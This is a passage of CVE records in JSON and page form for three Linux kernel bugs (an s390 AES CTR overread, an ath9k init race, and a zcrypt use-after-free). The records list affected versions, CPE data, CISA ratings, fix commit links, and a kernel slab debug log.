"version": "6.1.76",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.15",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.210",
"versionStartIncluding": "3.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.149",
"versionStartIncluding": "3.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.76",
"versionStartIncluding": "3.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.15",
"versionStartIncluding": "3.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.3",
"versionStartIncluding": "3.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "3.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ncrypto: s390/aes - Fix buffer overread in CTR mode\n\nWhen processing the last block, the s390 ctr code will always read\na whole block, even if there isn\u0027t a whole block of data left. Fix\nthis by using the actual length left and copy it into a buffer first\nfor processing."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T07:41:12.654Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/cd51e26a3b89706beec64f2d8296cfb1c34e0c79"
},
{
"url": "https://git.kernel.org/stable/c/a7f580cdb42ec3d53bbb7c4e4335a98423703285"
},
{
"url": "https://git.kernel.org/stable/c/dbc9a791a70ea47be9f2acf251700fe254a2ab23"
},
{
"url": "https://git.kernel.org/stable/c/d68ac38895e84446848b7647ab9458d54cacba3e"
},
{
"url": "https://git.kernel.org/stable/c/e78f1a43e72daf77705ad5b9946de66fc708b874"
},
{
"url": "https://git.kernel.org/stable/c/d07f951903fa9922c375b8ab1ce81b18a0034e3b"
}
],
"title": "crypto: s390/aes - Fix buffer overread in CTR mode",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2023-52669",
"datePublished": "2024-05-17T14:01:57.025Z",
"dateReserved": "2024-03-07T14:49:46.885Z",
"dateUpdated": "2025-05-04T07:41:12.654Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26897 (GCVE-0-2024-26897)
Vulnerability from cvelistv5
Published
2024-04-17 10:27
Modified
2025-05-04 12:55
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
wifi: ath9k: delay all of ath9k_wmi_event_tasklet() until init is complete
The ath9k_wmi_event_tasklet() used in ath9k_htc assumes that all the data
structures have been fully initialised by the time it runs. However, because of
the order in which things are initialised, this is not guaranteed to be the
case, because the device is exposed to the USB subsystem before the ath9k driver
initialisation is completed.
We already committed a partial fix for this in commit:
8b3046abc99e ("ath9k_htc: fix NULL pointer dereference at ath9k_htc_tx_get_packet()")
However, that commit only aborted the WMI_TXSTATUS_EVENTID command in the event
tasklet, pairing it with an "initialisation complete" bit in the TX struct. It
seems syzbot managed to trigger the race for one of the other commands as well,
so let's just move the existing synchronisation bit to cover the whole
tasklet (setting it at the end of ath9k_htc_probe_device() instead of inside
ath9k_tx_init()).
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 78c8397132dd4735ac6a7b5a651302f0b9f264ad Version: 735aefae7b68025cd04c482a940c0f6fc6797a63 Version: 8b3046abc99eefe11438090bcc4ec3a3994b55d0 Version: 8b3046abc99eefe11438090bcc4ec3a3994b55d0 Version: 8b3046abc99eefe11438090bcc4ec3a3994b55d0 Version: 8b3046abc99eefe11438090bcc4ec3a3994b55d0 Version: 8b3046abc99eefe11438090bcc4ec3a3994b55d0 Version: 7bbc1a50a7963f14048f0e54b0b73159f86d4ea3 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:21:05.691Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/1bc5461a21c56a36e2a7d81e152b90ce019a3905"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f8ff4b4df71e87f609be0cc37d92e918107f9b90"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/74d0639261dd795dce958d1b14815bdcbb48a715"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a015fbf698c8957aa5fbeefc5c59dd2cf3107298"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ac90e22e735bac44f74b5161fb096fbeb0ff8bc2"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4afa0246656d5680c8a4c3fb37ba6570c4ab819b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/24355fcb0d4cbcb6ddda262596558e8cfba70f11"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26897",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:48:09.627095Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:23.543Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/wireless/ath/ath9k/htc.h",
"drivers/net/wireless/ath/ath9k/htc_drv_init.c",
"drivers/net/wireless/ath/ath9k/htc_drv_txrx.c",
"drivers/net/wireless/ath/ath9k/wmi.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "1bc5461a21c56a36e2a7d81e152b90ce019a3905",
"status": "affected",
"version": "78c8397132dd4735ac6a7b5a651302f0b9f264ad",
"versionType": "git"
},
{
"lessThan": "f8ff4b4df71e87f609be0cc37d92e918107f9b90",
"status": "affected",
"version": "735aefae7b68025cd04c482a940c0f6fc6797a63",
"versionType": "git"
},
{
"lessThan": "74d0639261dd795dce958d1b14815bdcbb48a715",
"status": "affected",
"version": "8b3046abc99eefe11438090bcc4ec3a3994b55d0",
"versionType": "git"
},
{
"lessThan": "a015fbf698c8957aa5fbeefc5c59dd2cf3107298",
"status": "affected",
"version": "8b3046abc99eefe11438090bcc4ec3a3994b55d0",
"versionType": "git"
},
{
"lessThan": "ac90e22e735bac44f74b5161fb096fbeb0ff8bc2",
"status": "affected",
"version": "8b3046abc99eefe11438090bcc4ec3a3994b55d0",
"versionType": "git"
},
{
"lessThan": "4afa0246656d5680c8a4c3fb37ba6570c4ab819b",
"status": "affected",
"version": "8b3046abc99eefe11438090bcc4ec3a3994b55d0",
"versionType": "git"
},
{
"lessThan": "24355fcb0d4cbcb6ddda262596558e8cfba70f11",
"status": "affected",
"version": "8b3046abc99eefe11438090bcc4ec3a3994b55d0",
"versionType": "git"
},
{
"status": "affected",
"version": "7bbc1a50a7963f14048f0e54b0b73159f86d4ea3",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/wireless/ath/ath9k/htc.h",
"drivers/net/wireless/ath/ath9k/htc_drv_init.c",
"drivers/net/wireless/ath/ath9k/htc_drv_txrx.c",
"drivers/net/wireless/ath/ath9k/wmi.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.17"
},
{
"lessThan": "5.17",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.214",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.153",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.83",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.23",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.11",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.2",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.214",
"versionStartIncluding": "5.10.136",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.153",
"versionStartIncluding": "5.15.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.83",
"versionStartIncluding": "5.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.23",
"versionStartIncluding": "5.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.11",
"versionStartIncluding": "5.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.2",
"versionStartIncluding": "5.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "5.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "5.16.3",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: ath9k: delay all of ath9k_wmi_event_tasklet() until init is complete\n\nThe ath9k_wmi_event_tasklet() used in ath9k_htc assumes that all the data\nstructures have been fully initialised by the time it runs. However, because of\nthe order in which things are initialised, this is not guaranteed to be the\ncase, because the device is exposed to the USB subsystem before the ath9k driver\ninitialisation is completed.\n\nWe already committed a partial fix for this in commit:\n8b3046abc99e (\"ath9k_htc: fix NULL pointer dereference at ath9k_htc_tx_get_packet()\")\n\nHowever, that commit only aborted the WMI_TXSTATUS_EVENTID command in the event\ntasklet, pairing it with an \"initialisation complete\" bit in the TX struct. It\nseems syzbot managed to trigger the race for one of the other commands as well,\nso let\u0027s just move the existing synchronisation bit to cover the whole\ntasklet (setting it at the end of ath9k_htc_probe_device() instead of inside\nath9k_tx_init())."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T12:55:07.571Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/1bc5461a21c56a36e2a7d81e152b90ce019a3905"
},
{
"url": "https://git.kernel.org/stable/c/f8ff4b4df71e87f609be0cc37d92e918107f9b90"
},
{
"url": "https://git.kernel.org/stable/c/74d0639261dd795dce958d1b14815bdcbb48a715"
},
{
"url": "https://git.kernel.org/stable/c/a015fbf698c8957aa5fbeefc5c59dd2cf3107298"
},
{
"url": "https://git.kernel.org/stable/c/ac90e22e735bac44f74b5161fb096fbeb0ff8bc2"
},
{
"url": "https://git.kernel.org/stable/c/4afa0246656d5680c8a4c3fb37ba6570c4ab819b"
},
{
"url": "https://git.kernel.org/stable/c/24355fcb0d4cbcb6ddda262596558e8cfba70f11"
}
],
"title": "wifi: ath9k: delay all of ath9k_wmi_event_tasklet() until init is complete",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26897",
"datePublished": "2024-04-17T10:27:47.842Z",
"dateReserved": "2024-02-19T14:20:24.186Z",
"dateUpdated": "2025-05-04T12:55:07.571Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26957 (GCVE-0-2024-26957)
Vulnerability from cvelistv5
Published
2024-05-01 05:19
Modified
2025-05-16 07:23
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
s390/zcrypt: fix reference counting on zcrypt card objects
Tests with hot-plugging crytpo cards on KVM guests with debug
kernel build revealed an use after free for the load field of
the struct zcrypt_card. The reason was an incorrect reference
handling of the zcrypt card object which could lead to a free
of the zcrypt card object while it was still in use.
This is an example of the slab message:
kernel: 0x00000000885a7512-0x00000000885a7513 @offset=1298. First byte 0x68 instead of 0x6b
kernel: Allocated in zcrypt_card_alloc+0x36/0x70 [zcrypt] age=18046 cpu=3 pid=43
kernel: kmalloc_trace+0x3f2/0x470
kernel: zcrypt_card_alloc+0x36/0x70 [zcrypt]
kernel: zcrypt_cex4_card_probe+0x26/0x380 [zcrypt_cex4]
kernel: ap_device_probe+0x15c/0x290
kernel: really_probe+0xd2/0x468
kernel: driver_probe_device+0x40/0xf0
kernel: __device_attach_driver+0xc0/0x140
kernel: bus_for_each_drv+0x8c/0xd0
kernel: __device_attach+0x114/0x198
kernel: bus_probe_device+0xb4/0xc8
kernel: device_add+0x4d2/0x6e0
kernel: ap_scan_adapter+0x3d0/0x7c0
kernel: ap_scan_bus+0x5a/0x3b0
kernel: ap_scan_bus_wq_callback+0x40/0x60
kernel: process_one_work+0x26e/0x620
kernel: worker_thread+0x21c/0x440
kernel: Freed in zcrypt_card_put+0x54/0x80 [zcrypt] age=9024 cpu=3 pid=43
kernel: kfree+0x37e/0x418
kernel: zcrypt_card_put+0x54/0x80 [zcrypt]
kernel: ap_device_remove+0x4c/0xe0
kernel: device_release_driver_internal+0x1c4/0x270
kernel: bus_remove_device+0x100/0x188
kernel: device_del+0x164/0x3c0
kernel: device_unregister+0x30/0x90
kernel: ap_scan_adapter+0xc8/0x7c0
kernel: ap_scan_bus+0x5a/0x3b0
kernel: ap_scan_bus_wq_callback+0x40/0x60
kernel: process_one_work+0x26e/0x620
kernel: worker_thread+0x21c/0x440
kernel: kthread+0x150/0x168
kernel: __ret_from_fork+0x3c/0x58
kernel: ret_from_fork+0xa/0x30
kernel: Slab 0x00000372022169c0 objects=20 used=18 fp=0x00000000885a7c88 flags=0x3ffff00000000a00(workingset|slab|node=0|zone=1|lastcpupid=0x1ffff)
kernel: Object 0x00000000885a74b8 @offset=1208 fp=0x00000000885a7c88
kernel: Redzone 00000000885a74b0: bb bb bb bb bb bb bb bb ........
kernel: Object 00000000885a74b8: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b kkkkkkkkkkkkkkkk
kernel: Object 00000000885a74c8: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b kkkkkkkkkkkkkkkk
kernel: Object 00000000885a74d8: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b kkkkkkkkkkkkkkkk
kernel: Object 00000000885a74e8: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b kkkkkkkkkkkkkkkk
kernel: Object 00000000885a74f8: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b kkkkkkkkkkkkkkkk
kernel: Object 00000000885a7508: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 68 4b 6b 6b 6b a5 kkkkkkkkkkhKkkk.
kernel: Redzone 00000000885a7518: bb bb bb bb bb bb bb bb ........
kernel: Padding 00000000885a756c: 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a ZZZZZZZZZZZZ
kernel: CPU: 0 PID: 387 Comm: systemd-udevd Not tainted 6.8.0-HF #2
kernel: Hardware name: IBM 3931 A01 704 (KVM/Linux)
kernel: Call Trace:
kernel: [<00000000ca5ab5b8>] dump_stack_lvl+0x90/0x120
kernel: [<00000000c99d78bc>] check_bytes_and_report+0x114/0x140
kernel: [<00000000c99d53cc>] check_object+0x334/0x3f8
kernel: [<00000000c99d820c>] alloc_debug_processing+0xc4/0x1f8
kernel: [<00000000c99d852e>] get_partial_node.part.0+0x1ee/0x3e0
kernel: [<00000000c99d94ec>] ___slab_alloc+0xaf4/0x13c8
kernel: [<00000000c99d9e38>] __slab_alloc.constprop.0+0x78/0xb8
kernel: [<00000000c99dc8dc>] __kmalloc+0x434/0x590
kernel: [<00000000c9b4c0ce>] ext4_htree_store_dirent+0x4e/0x1c0
kernel: [<00000000c9b908a2>] htree_dirblock_to_tree+0x17a/0x3f0
kernel:
---truncated---
References
| URL | Tags | ||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "7e500849fa55",
"status": "affected",
"version": "1da177e4c3f4",
"versionType": "custom"
},
{
"lessThan": "9daddee03de3",
"status": "affected",
"version": "1da177e4c3f4",
"versionType": "custom"
},
{
"lessThan": "6470078ab3d8",
"status": "affected",
"version": "1da177e4c3f4",
"versionType": "custom"
},
{
"lessThan": "a55677878b93",
"status": "affected",
"version": "1da177e4c3f4",
"versionType": "custom"
},
{
"lessThan": "b7f6c3630eb3",
"status": "affected",
"version": "1da177e4c3f4",
"versionType": "custom"
},
{
"lessThan": "a64ab862e84e",
"status": "affected",
"version": "1da177e4c3f4",
"versionType": "custom"
},
{
"lessThan": "befb7f889594",
"status": "affected",
"version": "1da177e4c3f4",
"versionType": "custom"
},
{
"lessThan": "394b6d8bbdf9",
"status": "affected",
"version": "1da177e4c3f4",
"versionType": "custom"
},
{
"lessThan": "50ed48c80fec",
"status": "affected",
"version": "1da177e4c3f4",
"versionType": "custom"
}
]
}
],
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26957",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-17T15:58:32.988246Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-416",
"description": "CWE-416 Use After Free",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-06-17T15:58:36.584Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:21:05.861Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7e500849fa558879a1cde43f80c7c048c2437058"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9daddee03de3f231012014dab8ab2b277a116a55"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6470078ab3d8f222115e11c4ec67351f3031b3dd"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a55677878b93e9ebc31f66d0e2fb93be5e7836a6"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b7f6c3630eb3f103115ab0d7613588064f665d0d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a64ab862e84e3e698cd351a87cdb504c7fc575ca"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/befb7f889594d23e1b475720cf93efd2f77df000"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/394b6d8bbdf9ddee6d5bcf3e1f3e9f23eecd6484"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/50ed48c80fecbe17218afed4f8bed005c802976c"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/s390/crypto/zcrypt_api.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "7e500849fa558879a1cde43f80c7c048c2437058",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "9daddee03de3f231012014dab8ab2b277a116a55",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "6470078ab3d8f222115e11c4ec67351f3031b3dd",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "a55677878b93e9ebc31f66d0e2fb93be5e7836a6",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "b7f6c3630eb3f103115ab0d7613588064f665d0d",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "a64ab862e84e3e698cd351a87cdb504c7fc575ca",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "befb7f889594d23e1b475720cf93efd2f77df000",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "394b6d8bbdf9ddee6d5bcf3e1f3e9f23eecd6484",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "50ed48c80fecbe17218afed4f8bed005c802976c",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/s390/crypto/zcrypt_api.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.312",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.274",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.215",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.154",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.84",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.24",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.12",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.312",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.274",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.215",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.154",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.84",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.24",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ns390/zcrypt: fix reference counting on zcrypt card objects\n\nTests with hot-plugging crytpo cards on KVM guests with debug\nkernel build revealed an use after free for the load field of\nthe struct zcrypt_card. The reason was an incorrect reference\nhandling of the zcrypt card object which could lead to a free\nof the zcrypt card object while it was still in use.\n\nThis is an example of the slab message:\n\n kernel: 0x00000000885a7512-0x00000000885a7513 @offset=1298. First byte 0x68 instead of 0x6b\n kernel: Allocated in zcrypt_card_alloc+0x36/0x70 [zcrypt] age=18046 cpu=3 pid=43\n kernel: kmalloc_trace+0x3f2/0x470\n kernel: zcrypt_card_alloc+0x36/0x70 [zcrypt]\n kernel: zcrypt_cex4_card_probe+0x26/0x380 [zcrypt_cex4]\n kernel: ap_device_probe+0x15c/0x290\n kernel: really_probe+0xd2/0x468\n kernel: driver_probe_device+0x40/0xf0\n kernel: __device_attach_driver+0xc0/0x140\n kernel: bus_for_each_drv+0x8c/0xd0\n kernel: __device_attach+0x114/0x198\n kernel: bus_probe_device+0xb4/0xc8\n kernel: device_add+0x4d2/0x6e0\n kernel: ap_scan_adapter+0x3d0/0x7c0\n kernel: ap_scan_bus+0x5a/0x3b0\n kernel: ap_scan_bus_wq_callback+0x40/0x60\n kernel: process_one_work+0x26e/0x620\n kernel: worker_thread+0x21c/0x440\n kernel: Freed in zcrypt_card_put+0x54/0x80 [zcrypt] age=9024 cpu=3 pid=43\n kernel: kfree+0x37e/0x418\n kernel: zcrypt_card_put+0x54/0x80 [zcrypt]\n kernel: ap_device_remove+0x4c/0xe0\n kernel: device_release_driver_internal+0x1c4/0x270\n kernel: bus_remove_device+0x100/0x188\n kernel: device_del+0x164/0x3c0\n kernel: device_unregister+0x30/0x90\n kernel: ap_scan_adapter+0xc8/0x7c0\n kernel: ap_scan_bus+0x5a/0x3b0\n kernel: ap_scan_bus_wq_callback+0x40/0x60\n kernel: process_one_work+0x26e/0x620\n kernel: worker_thread+0x21c/0x440\n kernel: kthread+0x150/0x168\n kernel: __ret_from_fork+0x3c/0x58\n kernel: ret_from_fork+0xa/0x30\n kernel: Slab 0x00000372022169c0 objects=20 used=18 fp=0x00000000885a7c88 flags=0x3ffff00000000a00(workingset|slab|node=0|zone=1|lastcpupid=0x1ffff)\n kernel: Object 0x00000000885a74b8 @offset=1208 fp=0x00000000885a7c88\n kernel: Redzone 00000000885a74b0: bb bb bb bb bb bb bb bb ........\n kernel: Object 00000000885a74b8: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b kkkkkkkkkkkkkkkk\n 